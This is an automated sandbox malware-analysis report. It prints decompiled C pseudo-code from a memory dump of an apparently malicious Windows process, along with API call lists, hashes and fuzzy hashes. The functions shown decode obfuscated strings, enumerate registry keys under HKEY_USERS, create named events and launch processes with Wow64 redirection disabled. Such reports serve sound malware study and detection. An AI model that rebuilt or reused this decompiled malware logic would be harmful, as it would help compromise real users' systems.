                                                                                  					_t42 =  &(_t49[_t5]);
                                                                                  					_t28 =  *_t42;
                                                                                  					_v5 = _t28;
                                                                                  					 *_t42 = 0;
                                                                                  					__imp__(_a8, _t41);
                                                                                  					_v16 = _t28;
                                                                                  					_t50 = StrStrA(_t49, _a8);
                                                                                  					if(_t50 != 0) {
                                                                                  						 *_t42 = _v5;
                                                                                  						_t33 = RtlAllocateHeap( *0x33fd1f0, 0, _a16 + _t55); // executed
                                                                                  						_t44 = _t33;
                                                                                  						if(_t44 == 0) {
                                                                                  							_v12 = 8;
                                                                                  						} else {
                                                                                  							_t51 = _t50 - _a4;
                                                                                  							memcpy(_t44, _a4, _t51);
                                                                                  							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                                                                  							_t45 = _v16;
                                                                                  							_t54 = _a16;
                                                                                  							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                                                                  							 *_a20 = _t44;
                                                                                  							_v12 = _v12 & 0x00000000;
                                                                                  							 *_a24 = _t55 - _v16 + _t54;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v12;
                                                                                  			}


















                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 033F1684
                                                                                  • StrStrA.SHLWAPI(00000000,?), ref: 033F1691
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 033F16B0
                                                                                  • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 033F16C4
                                                                                  • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16D3
                                                                                  • memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1819133394-0
                                                                                  • Opcode ID: 77aa42a2bd0bdcee319b3a973095c5518302bf2be08cc49cf6cc01dec6051d88
                                                                                  • Instruction ID: a2d1150dce0f10a3cd65594321e6ed26c95d6977b82f1490d75ea4e90dcc6f0d
                                                                                  • Opcode Fuzzy Hash: 77aa42a2bd0bdcee319b3a973095c5518302bf2be08cc49cf6cc01dec6051d88
                                                                                  • Instruction Fuzzy Hash: 02218E36900209AFDF119F68DC88A9EBFB9EF85300F484154F904AB305C734EA19CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 88%
                                                                                  			E033FA360(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                                                                  				signed int _v8;
                                                                                  				char _v12;
                                                                                  				signed int* _v16;
                                                                                  				void _v284;
                                                                                  				void* __esi;
                                                                                  				char* _t60;
                                                                                  				intOrPtr* _t61;
                                                                                  				void* _t63;
                                                                                  				intOrPtr _t65;
                                                                                  				char _t68;
                                                                                  				void* _t71;
                                                                                  				intOrPtr _t72;
                                                                                  				void* _t73;
                                                                                  				intOrPtr _t75;
                                                                                  				void* _t78;
                                                                                  				void* _t88;
                                                                                  				void* _t96;
                                                                                  				void* _t97;
                                                                                  				int _t102;
                                                                                  				signed int* _t104;
                                                                                  				intOrPtr* _t105;
                                                                                  				void* _t106;
                                                                                  
                                                                                  				_t97 = __ecx;
                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                  				_t102 = _a16;
                                                                                  				if(_t102 == 0) {
                                                                                  					__imp__( &_v284,  *0x33fd2ec);
                                                                                  					_t96 = 0x80000002;
                                                                                  					L6:
                                                                                  					_t60 = E033F745D(0,  &_v284);
                                                                                  					_a8 = _t60;
                                                                                  					if(_t60 == 0) {
                                                                                  						_v8 = 8;
                                                                                  						L29:
                                                                                  						_t61 = _a20;
                                                                                  						if(_t61 != 0) {
                                                                                  							 *_t61 =  *_t61 + 1;
                                                                                  						}
                                                                                  						return _v8;
                                                                                  					}
                                                                                  					_t105 = _a24;
                                                                                  					_t63 = E033F8557(_t97, _t105, _t96, _t60); // executed
                                                                                  					if(_t63 != 0) {
                                                                                  						L27:
                                                                                  						E033F4C31(_a8);
                                                                                  						goto L29;
                                                                                  					}
                                                                                  					_t65 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t16 = _t65 + 0x33fe908; // 0x65696c43
                                                                                  					_t68 = E033F745D(0, _t16);
                                                                                  					_a24 = _t68;
                                                                                  					if(_t68 == 0) {
                                                                                  						L14:
                                                                                  						_t29 = _t105 + 0x14; // 0x102
                                                                                  						_t33 = _t105 + 0x10; // 0x3d033fc0, executed
                                                                                  						_t71 = E033F7325( *_t33, _t96, _a8,  *0x33fd2e4,  *((intOrPtr*)( *_t29 + 0x28))); // executed
                                                                                  						if(_t71 == 0) {
                                                                                  							_t72 =  *0x33fd230; // 0x2b2a5a8
                                                                                  							if(_t102 == 0) {
                                                                                  								_t35 = _t72 + 0x33fea0f; // 0x4d4c4b48
                                                                                  								_t73 = _t35;
                                                                                  							} else {
                                                                                  								_t34 = _t72 + 0x33fe927; // 0x55434b48
                                                                                  								_t73 = _t34;
                                                                                  							}
                                                                                  							if(E033F7D0C( &_a24, _t73,  *0x33fd2e4,  *0x33fd2e8,  &_a24,  &_a16) == 0) {
                                                                                  								if(_t102 == 0) {
                                                                                  									_t75 =  *0x33fd230; // 0x2b2a5a8
                                                                                  									_t44 = _t75 + 0x33fe893; // 0x74666f53
                                                                                  									_t78 = E033F745D(0, _t44);
                                                                                  									_t103 = _t78;
                                                                                  									if(_t78 == 0) {
                                                                                  										_v8 = 8;
                                                                                  									} else {
                                                                                  										_t47 = _t105 + 0x10; // 0x3d033fc0
                                                                                  										E033F3FF3( *_t47, _t96, _a8,  *0x33fd2e8, _a24);
                                                                                  										_t49 = _t105 + 0x10; // 0x3d033fc0
                                                                                  										E033F3FF3( *_t49, _t96, _t103,  *0x33fd2e0, _a16);
                                                                                  										E033F4C31(_t103);
                                                                                  									}
                                                                                  								} else {
                                                                                  									_t40 = _t105 + 0x10; // 0x3d033fc0
                                                                                  									E033F3FF3( *_t40, _t96, _a8,  *0x33fd2e8, _a24);
                                                                                  									_t43 = _t105 + 0x10; // 0x3d033fc0
                                                                                  									E033F3FF3( *_t43, _t96, _a8,  *0x33fd2e0, _a16);
                                                                                  								}
                                                                                  								if( *_t105 != 0) {
                                                                                  									E033F4C31(_a24);
                                                                                  								} else {
                                                                                  									 *_t105 = _a16;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						goto L27;
                                                                                  					}
                                                                                  					_t21 = _t105 + 0x10; // 0x3d033fc0
                                                                                  					if(E033F51C4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                  						_t104 = _v16;
                                                                                  						_t88 = 0x28;
                                                                                  						if(_v12 == _t88) {
                                                                                  							 *_t104 =  *_t104 & 0x00000000;
                                                                                  							_t26 = _t105 + 0x10; // 0x3d033fc0
                                                                                  							E033F7325( *_t26, _t96, _a8, _a24, _t104);
                                                                                  						}
                                                                                  						E033F4C31(_t104);
                                                                                  						_t102 = _a16;
                                                                                  					}
                                                                                  					E033F4C31(_a24);
                                                                                  					goto L14;
                                                                                  				}
                                                                                  				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                  					goto L29;
                                                                                  				} else {
                                                                                  					memcpy( &_v284, _a8, _t102);
                                                                                  					__imp__(_t106 + _t102 - 0x117,  *0x33fd2ec);
                                                                                  					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                                                                  					_t96 = 0x80000003;
                                                                                  					goto L6;
                                                                                  				}
                                                                                  			}

























                                                                                  0x033fa560
                                                                                  0x033fa560
                                                                                  0x033fa55b
                                                                                  0x033fa4d2
                                                                                  0x00000000
                                                                                  0x033fa499
                                                                                  0x033fa441
                                                                                  0x033fa44b
                                                                                  0x033fa44d
                                                                                  0x033fa452
                                                                                  0x033fa456
                                                                                  0x033fa458
                                                                                  0x033fa463
                                                                                  0x033fa466
                                                                                  0x033fa466
                                                                                  0x033fa46c
                                                                                  0x033fa471
                                                                                  0x033fa471
                                                                                  0x033fa477
                                                                                  0x00000000
                                                                                  0x033fa477
                                                                                  0x033fa37a
                                                                                  0x00000000
                                                                                  0x033fa3a1
                                                                                  0x033fa3ac
                                                                                  0x033fa3c2
                                                                                  0x033fa3c8
                                                                                  0x033fa3d0
                                                                                  0x00000000
                                                                                  0x033fa3d0

                                                                                  APIs
                                                                                  • StrChrA.SHLWAPI(033F544E,0000005F,00000000,00000000,00000104), ref: 033FA393
                                                                                  • memcpy.NTDLL(?,033F544E,?), ref: 033FA3AC
                                                                                  • lstrcpy.KERNEL32(?), ref: 033FA3C2
                                                                                    • Part of subcall function 033F745D: lstrlen.KERNEL32(?,033FD2E0,73BB7FC0,00000000,033F534B,?,?,?,?,?,033F70B5,?), ref: 033F7466
                                                                                    • Part of subcall function 033F745D: mbstowcs.NTDLL ref: 033F748D
                                                                                    • Part of subcall function 033F745D: memset.NTDLL ref: 033F749F
                                                                                    • Part of subcall function 033F3FF3: lstrlenW.KERNEL32(033F544E,?,?,033FA536,3D033FC0,80000002,033F544E,033F5886,74666F53,4D4C4B48,033F5886,?,3D033FC0,80000002,033F544E,?), ref: 033F4013
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 033FA3E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                                                                  • String ID: \
                                                                                  • API String ID: 2598994505-2967466578
                                                                                  • Opcode ID: 131e8dfd148072f641e2aefd4b5c411f5ccd29e0aefa5814665fb24fb8fad11a
                                                                                  • Instruction ID: 2782e6535739759e7e107fb1fdbf49a1b546d76c6384d6aa72de4d4cc276372f
                                                                                  • Opcode Fuzzy Hash: 131e8dfd148072f641e2aefd4b5c411f5ccd29e0aefa5814665fb24fb8fad11a
                                                                                  • Instruction Fuzzy Hash: 2351597690020ABFCF11EFA0DCC4EAA7BBDEB08350F804525FA599A164D735DA15EF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 32%
                                                                                  			E033F3267(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v44;
                                                                                  				intOrPtr _v48;
                                                                                  				intOrPtr _v52;
                                                                                  				void _v60;
                                                                                  				char _v64;
                                                                                  				long _t18;
                                                                                  				intOrPtr _t22;
                                                                                  				intOrPtr _t23;
                                                                                  				long _t29;
                                                                                  				intOrPtr _t30;
                                                                                  				intOrPtr _t31;
                                                                                  				intOrPtr* _t32;
                                                                                  
                                                                                  				_t30 = __edi;
                                                                                  				_t29 = _a4;
                                                                                  				_t31 = __eax;
                                                                                  				_t18 = E033F83EC(_t29, __edi, __eax); // executed
                                                                                  				_a4 = _t18;
                                                                                  				if(_t18 != 0) {
                                                                                  					memset( &_v60, 0, 0x38);
                                                                                  					_t22 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_v64 = 0x3c;
                                                                                  					if(_a8 == 0) {
                                                                                  						_t7 = _t22 + 0x33fe4e0; // 0x70006f
                                                                                  						_t23 = _t7;
                                                                                  					} else {
                                                                                  						_t6 = _t22 + 0x33fe92c; // 0x750072
                                                                                  						_t23 = _t6;
                                                                                  					}
                                                                                  					_v36 = _t31;
                                                                                  					_t32 = __imp__;
                                                                                  					_v52 = _t23;
                                                                                  					_v48 = _t29;
                                                                                  					_v44 = _t30;
                                                                                  					 *_t32(0);
                                                                                  					_push( &_v64);
                                                                                  					if( *0x33fd0e4() != 0) {
                                                                                  						_a4 = _a4 & 0x00000000;
                                                                                  					} else {
                                                                                  						_a4 = GetLastError();
                                                                                  					}
                                                                                  					 *_t32(1);
                                                                                  				}
                                                                                  				return _a4;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 033F83EC: SysAllocString.OLEAUT32(?), ref: 033F8448
                                                                                    • Part of subcall function 033F83EC: SysAllocString.OLEAUT32(0070006F), ref: 033F845C
                                                                                    • Part of subcall function 033F83EC: SysAllocString.OLEAUT32(00000000), ref: 033F846E
                                                                                    • Part of subcall function 033F83EC: SysFreeString.OLEAUT32(00000000), ref: 033F84D2
                                                                                  • memset.NTDLL ref: 033F328B
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 033F32C7
                                                                                  • GetLastError.KERNEL32 ref: 033F32D7
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 033F32E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                                                  • String ID: <
                                                                                  • API String ID: 593937197-4251816714
                                                                                  • Opcode ID: f2f68c8c5c36532dc641c971982622a503923f99527b472dafbe9c58794d9877
                                                                                  • Instruction ID: 5f6285c648342155dd1c2b8dddb2a43619c70db8c9bff925a4ec50853cd829fd
                                                                                  • Opcode Fuzzy Hash: f2f68c8c5c36532dc641c971982622a503923f99527b472dafbe9c58794d9877
                                                                                  • Instruction Fuzzy Hash: 8511FA75900218BFDB10EFA5D8C9BD97BBCFB08390F848016EA05EA244D778D5458BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4838(signed int _a4, signed int* _a8) {
                                                                                  				void* __ecx;
                                                                                  				void* __edi;
                                                                                  				signed int _t6;
                                                                                  				intOrPtr _t8;
                                                                                  				intOrPtr _t12;
                                                                                  				long _t14;
                                                                                  				void* _t18;
                                                                                  				long _t21;
                                                                                  				void* _t25;
                                                                                  				void* _t26;
                                                                                  				signed int* _t27;
                                                                                  				signed short* _t28;
                                                                                  				CHAR* _t30;
                                                                                  				long _t31;
                                                                                  				WCHAR** _t32;
                                                                                  
                                                                                  				_t6 =  *0x33fd228; // 0xbd092303
                                                                                  				_t32 = _a4;
                                                                                  				_a4 = _t6 ^ 0xd05b5869;
                                                                                  				_t8 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t3 = _t8 + 0x33fe84d; // 0x61636f4c
                                                                                  				_t25 = 0;
                                                                                  				_t30 = E033F4200(_t3, 1);
                                                                                  				if(_t30 != 0) {
                                                                                  					_t25 = CreateEventA(0x33fd234, 1, 0, _t30);
                                                                                  					E033F4C31(_t30);
                                                                                  				}
                                                                                  				_t12 =  *0x33fd214; // 0x4000000a
                                                                                  				if(_t12 != 6 || _t12 < 2) {
                                                                                  					if( *_t32 == 0) {
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					_t18 = E033F31DD(); // executed
                                                                                  					if(_t18 != 0) {
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					_t28 = StrChrW( *_t32, 0x20);
                                                                                  					if(_t28 != 0) {
                                                                                  						 *_t28 =  *_t28 & 0x00000000;
                                                                                  						_t28 =  &(_t28[1]);
                                                                                  					}
                                                                                  					_t21 = E033F3267(0, _t28,  *_t32, 0); // executed
                                                                                  					_t31 = _t21;
                                                                                  					if(_t31 == 0) {
                                                                                  						if(_t25 == 0) {
                                                                                  							goto L21;
                                                                                  						}
                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                  						if(_t31 == 0) {
                                                                                  							goto L19;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L11;
                                                                                  				} else {
                                                                                  					L11:
                                                                                  					_t27 = _a8;
                                                                                  					if(_t27 != 0) {
                                                                                  						 *_t27 =  *_t27 | 0x00000001;
                                                                                  					}
                                                                                  					_t14 = E033F7E3F(_t32, _t26); // executed
                                                                                  					_t31 = _t14;
                                                                                  					if(_t31 == 0 && _t25 != 0) {
                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                  					}
                                                                                  					if(_t27 != 0 && _t31 != 0) {
                                                                                  						 *_t27 =  *_t27 & 0xfffffffe;
                                                                                  					}
                                                                                  					L19:
                                                                                  					if(_t25 != 0) {
                                                                                  						CloseHandle(_t25);
                                                                                  					}
                                                                                  					L21:
                                                                                  					return _t31;
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 033F4200: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,033F70CE,74666F53,00000000,?,00000000,?,?,033F79D7), ref: 033F4236
                                                                                    • Part of subcall function 033F4200: lstrcpy.KERNEL32(00000000,00000000), ref: 033F425A
                                                                                    • Part of subcall function 033F4200: lstrcat.KERNEL32(00000000,00000000), ref: 033F4262
                                                                                  • CreateEventA.KERNEL32(033FD234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F4877
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • StrChrW.SHLWAPI(033F546D,00000020,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F48A7
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,033F546D,00000000,?,00000000,?,033F546D,?,?,?,?,?,?,?,033F38C3), ref: 033F48D5
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F4903
                                                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F491B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 73268831-0
                                                                                  • Opcode ID: d9aa1cde8009c0cc9ebfec211abf7159d765b3a849b30c5c3ebfc28bacaeb084
                                                                                  • Instruction ID: 2485cbf63e9ebde869a23d3cfb47366f06a9bc2eb5813e1282b2387e22ecd57e
                                                                                  • Opcode Fuzzy Hash: d9aa1cde8009c0cc9ebfec211abf7159d765b3a849b30c5c3ebfc28bacaeb084
                                                                                  • Instruction Fuzzy Hash: 4F21B736A403566FD721EBAA9CC8B5BB7DDEF48B11FC90625FF01DB244DB65C8018690
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F57B9(void* __ecx, intOrPtr _a4) {
                                                                                  				int* _v8;
                                                                                  				int _v12;
                                                                                  				int* _v16;
                                                                                  				int _v20;
                                                                                  				int* _v24;
                                                                                  				char* _v28;
                                                                                  				void* _v32;
                                                                                  				long _t33;
                                                                                  				char* _t35;
                                                                                  				long _t39;
                                                                                  				long _t42;
                                                                                  				intOrPtr _t47;
                                                                                  				void* _t51;
                                                                                  				long _t53;
                                                                                  
                                                                                  				_t51 = __ecx;
                                                                                  				_v8 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                                                                  				_t53 = _t33;
                                                                                  				if(_t53 != 0) {
                                                                                  					L18:
                                                                                  					return _t53;
                                                                                  				}
                                                                                  				_t53 = 8;
                                                                                  				_t35 = E033F75C4(0x104);
                                                                                  				_v28 = _t35;
                                                                                  				if(_t35 == 0) {
                                                                                  					L17:
                                                                                  					RegCloseKey(_v32); // executed
                                                                                  					goto L18;
                                                                                  				}
                                                                                  				_v20 = 0x104;
                                                                                  				do {
                                                                                  					_v16 = _v20;
                                                                                  					_v12 = 0x104;
                                                                                  					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                                                                  					_t53 = _t39;
                                                                                  					if(_t53 != 0xea) {
                                                                                  						if(_t53 != 0) {
                                                                                  							L14:
                                                                                  							if(_t53 == 0x103) {
                                                                                  								_t53 = 0;
                                                                                  							}
                                                                                  							L16:
                                                                                  							E033F4C31(_v28);
                                                                                  							goto L17;
                                                                                  						}
                                                                                  						_t42 = E033FA360(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                                                                  						_t53 = _t42;
                                                                                  						if(_t53 != 0) {
                                                                                  							goto L14;
                                                                                  						}
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					if(_v12 <= 0x104) {
                                                                                  						if(_v16 <= _v20) {
                                                                                  							goto L16;
                                                                                  						}
                                                                                  						E033F4C31(_v24);
                                                                                  						_v20 = _v16;
                                                                                  						_t47 = E033F75C4(_v16);
                                                                                  						_v24 = _t47;
                                                                                  						if(_t47 != 0) {
                                                                                  							L6:
                                                                                  							_t53 = 0;
                                                                                  							goto L12;
                                                                                  						}
                                                                                  						_t53 = 8;
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					_v8 = _v8 + 1;
                                                                                  					goto L6;
                                                                                  					L12:
                                                                                  				} while (WaitForSingleObject( *0x33fd224, 0) == 0x102);
                                                                                  				goto L16;
                                                                                  			}


















                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,033F544E,?), ref: 033F57DF
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • RegEnumKeyExA.KERNELBASE(?,?,?,033F544E,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,033F544E), ref: 033F5826
                                                                                  • WaitForSingleObject.KERNEL32(00000000,?,?,?,033F544E,?,033F544E,?,?,?,?,?,033F544E,?), ref: 033F5893
                                                                                  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,033F544E,?,?,?,?,?,033F38C3,?), ref: 033F58BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 3664505660-0
                                                                                  • Opcode ID: 208d8b92e69636ee4f5c659902c3b9c477cd3ff5bc727d340b5a58868d8a5897
                                                                                  • Instruction ID: 66ec0aa77f71913df72beed40034d1ed24c621a697fa8489c1ac1a968dc553a5
                                                                                  • Opcode Fuzzy Hash: 208d8b92e69636ee4f5c659902c3b9c477cd3ff5bc727d340b5a58868d8a5897
                                                                                  • Instruction Fuzzy Hash: 35313776E0021DBFEF21EBA5CCC49EEFEBDEB45741F944066E621B2250D2744A409B90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(80000002), ref: 033F88B8
                                                                                  • SysAllocString.OLEAUT32(033FA412), ref: 033F88FB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F890F
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F891D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: String$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 344208780-0
                                                                                  • Opcode ID: 7b033c7100e1814124ea48b893674be760d22da0f9910bbc592292e214514a84
                                                                                  • Instruction ID: ccbe500ad18cb19066329fcc39e6fc8f36b5750d3ccad638664d01e4524c64da
                                                                                  • Opcode Fuzzy Hash: 7b033c7100e1814124ea48b893674be760d22da0f9910bbc592292e214514a84
                                                                                  • Instruction Fuzzy Hash: 35311E76900109EFCB09DF98D8C48AEBBB9FF48340B54856EFA069B210E7359645CF62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 41%
                                                                                  			E033F53BE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				void* __esi;
                                                                                  				void* _t20;
                                                                                  				void* _t26;
                                                                                  				void* _t29;
                                                                                  				void* _t38;
                                                                                  				signed int* _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				_t36 = __ecx;
                                                                                  				_v32 = 0;
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				_v12 = _a4;
                                                                                  				_t20 = E033F8A0C(__ecx,  &_v32); // executed
                                                                                  				_t38 = _t20;
                                                                                  				if(_t38 != 0) {
                                                                                  					L12:
                                                                                  					_t39 = _a8;
                                                                                  					L13:
                                                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                  						_t23 =  &(_t39[1]);
                                                                                  						if(_t39[1] != 0) {
                                                                                  							E033F5758(_t23);
                                                                                  						}
                                                                                  					}
                                                                                  					return _t38;
                                                                                  				}
                                                                                  				_t26 = E033F6D86(0x40,  &_v16); // executed
                                                                                  				if(_t26 != 0) {
                                                                                  					_v16 = 0;
                                                                                  				}
                                                                                  				_t40 = CreateEventA(0x33fd234, 1, 0,  *0x33fd2f8);
                                                                                  				if(_t40 != 0) {
                                                                                  					SetEvent(_t40);
                                                                                  					Sleep(0xbb8); // executed
                                                                                  					FindCloseChangeNotification(_t40); // executed
                                                                                  				}
                                                                                  				_push( &_v32);
                                                                                  				if(_a12 == 0) {
                                                                                  					_t29 = E033F57B9(_t36); // executed
                                                                                  				} else {
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_t29 = E033FA360(_t36);
                                                                                  				}
                                                                                  				_t41 = _v16;
                                                                                  				_t38 = _t29;
                                                                                  				if(_v16 != 0) {
                                                                                  					E033F30BF(_t41);
                                                                                  				}
                                                                                  				if(_t38 != 0) {
                                                                                  					goto L12;
                                                                                  				} else {
                                                                                  					_t39 = _a8;
                                                                                  					_t38 = E033F4838( &_v32, _t39);
                                                                                  					goto L13;
                                                                                  				}
                                                                                  			}















                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(033FD234,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,033F38C3,?,00000001), ref: 033F540F
                                                                                  • SetEvent.KERNEL32(00000000,?,?,?,?,033F38C3,?,00000001,033F7A05,00000002,?,?,033F7A05), ref: 033F541C
                                                                                  • Sleep.KERNELBASE(00000BB8,?,?,?,?,033F38C3,?,00000001,033F7A05,00000002,?,?,033F7A05), ref: 033F5427
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,033F38C3,?,00000001,033F7A05,00000002,?,?,033F7A05), ref: 033F542E
